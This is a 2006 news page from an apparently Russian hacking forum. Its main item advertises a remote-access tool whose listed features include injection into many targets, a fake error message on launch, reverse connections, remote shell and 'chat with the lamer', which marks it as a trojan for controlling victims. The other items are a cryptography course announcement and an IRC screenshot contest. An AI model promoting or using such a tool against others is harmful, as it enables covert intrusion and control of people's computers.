- Инфа о компе
- Управление мышью
- VBS и BAT script executer
- Контроль над разрешением экрана
- Socks5 with NOAUTH
- Фаилменеджер (очень многофункциональный)
- Шелл
- Проигрывательнекоторых медиа файлов
- Поиск файлов
- Менеджер окон
- Многофункциональный менеджерт процессов
- Многофункциональный редактор реестра
- Менеджер буфера обмена
- Подгрузка плагинов сервера
- Менеждертсоединений
- Управление работой компьютера
- Message box
- Web download
- IP Range сканер
- Чат с ламером
- shellExecute
- TCP tunnel с множеством соединений на разные порты
- И еще куча всего - лень переводить

[New$paN]

--------------- Client abilities ---------------------

- EurekaLog protected client, so you can send logs directly to my email
- Multi-Threaded client, you can perform many tasks at once
- Lag meter and pingtimeout for servers not responding after 3 tries (or you define the timeout tries)
- Average speed, in/out global traffic, even for plugins
- Broadcast commands to your online server list: download, execute plugin command, disconnect,
close, update, uninstall
- Every single request made from the client is using one port, so you wont need to forward a lot
of ports again when using reverse on a computer behind a router
- Update/Uninstall/Close/Disconnect servers simpliest task ever
- Support for reverse and direct connections simultaneously
- Saves spaces by using right-click menus and not having big buttons for everything
- Built-in help for most of functions, just click the question marks around the client
- Sounds for downloads, connections and disconnections
- Plugin system compatible with most languages, since they use stdcall as export, Delphi and C++ tested
- Hybrid server mode: listen on a port or reverse connect at same time on the same server!
- Flow control for commands, you wont get content before the last ends!

---------------- Server abilities ---------------------

- Server can either be injected to a lot of targets at same time or be loaded by the server exe
- Possibility for creating reverse or direct connection servers
- Fake error message on execution
- Bind plugins with the server and execute its functions on load
- Make plugins as generic (no gui needed), client based (using a gui plugin on client side) and
extension (add functionality to the server)
- The server has a lot of error checking, to guarantee its going to be stable
- Encrypted information between client-server
- Relatively small exe, considering all its functions
- PHP script logging enabled, keep track of your direct and reverse connections

Скриншот|Screenshot

:zns5:

Скачать|Download

Winux · 05.06.2006

Курс криптографии University of Washington

University of Washington подготовил совершенно бесплатный курс по криптографии. Его онлайн версия доступна тут.
Скачать презентации, видео (mp3, WMV), домашние задания и т.п. можно тут.
Язык, конечно английский.
Источник: web-hack.ru[New$paN]

Winux · 05.06.2006

http://news.xss.pro/irc.gif
Объявляется конкурс на самый красивый IRC клиент.
От Вас потребуются скриншоты IRC клиента.
Условия:
1. Размер файла - не более 200 кб в формате jpg
2. Разрешение 1024 на 780 или меньше
3. На скриншоте должны пресутствовать:
whois (/whois any_nick)
action text (/me test)
join text
mode text
nick text
normal text
Интересует ваши чветовые сочетания. Желателен но необязателен кик текст.
Подробности далее>>[New$paN]

Желательно все на канале irc.dalnet.ru #damagelab
Сужу конкурс я (мр. Винукс) и fatal_bug.
Конкурс спонсирует fatal_bug.

Конкурс прододится до 20 июня 2006 года!
:screenshot:

Показательный скриншот - пример

Архив новостей (2004-2015 год)

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

(L1) cache

Старожил форума

(L1) cache

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума

Старожил форума